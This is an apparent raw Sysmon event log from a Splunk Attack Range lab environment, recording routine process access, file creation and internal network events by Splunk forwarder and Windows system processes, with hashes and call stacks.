AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:19.317{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21EBD816D4116CA2D33AD25945F4AF09,SHA256=108173C51DD3FB27C1F082A0513689785A6BD9098F76016A197AA55C96578F67,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.817{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DE8-6216-9C04-000000003802}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.817{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0DE8-6216-9C04-000000003802}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.817{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.817{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.817{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.817{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.817{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DE8-6216-9C04-000000003802}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.819{C8EA50B7-0DE8-6216-9C04-000000003802}4900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1D7AD43EA12A57836BA0EA7C76A6C09,SHA256=1A3CC069F2D173F22B4BF96C30BF1B3EE354B9C2C2FF548A6DE438769C8EFE5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.676{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F96F303C4B935F60FD4D8274D0E813C,SHA256=52A12F120A1E3A2A77794E36B8FA468E263FE9F81F39A2C8E71C168C38D9B9F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.535{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97F75565A1A3F1D1C96BB0DA85E972F3,SHA256=6255977DA77B767832F14E1E2436A506882189AEBEDC35BC3AEB5B6BB84495A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:17.651{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51157-false10.0.1.12-8000- 23542300x8000000000000000213958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:20.057{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D512D3BCAE8A048883C2E4D561CF615,SHA256=089FF7A2083B37567A28DFD5C19A5CDA290D24A7CFE24693F7A117D9040AE996,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.442{C8EA50B7-0DE8-6216-9B04-000000003802}56924268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000284884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:17.591{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53209-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000284883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.192{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DE8-6216-9B04-000000003802}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.192{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.192{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.192{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.192{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.192{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0DE8-6216-9B04-000000003802}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.192{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DE8-6216-9B04-000000003802}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:20.193{C8EA50B7-0DE8-6216-9B04-000000003802}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.910{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1D7AD43EA12A57836BA0EA7C76A6C09,SHA256=1A3CC069F2D173F22B4BF96C30BF1B3EE354B9C2C2FF548A6DE438769C8EFE5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9D2AFF2017221B2B7B6527B17E7DA94,SHA256=171D629A8E4AA23BD04BFDBAF305AC74F0B7B6B91E412DDCDC0461F1CE9B474A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:21.073{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ABA025C42799D8237B2F8E912694321,SHA256=BF206C7256986C1EA5FE26121DB8D51C80277C684B3D0E2739C72C11B7AC8153,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.332{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DE9-6216-9D04-000000003802}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.332{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.332{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.332{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:21.332{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\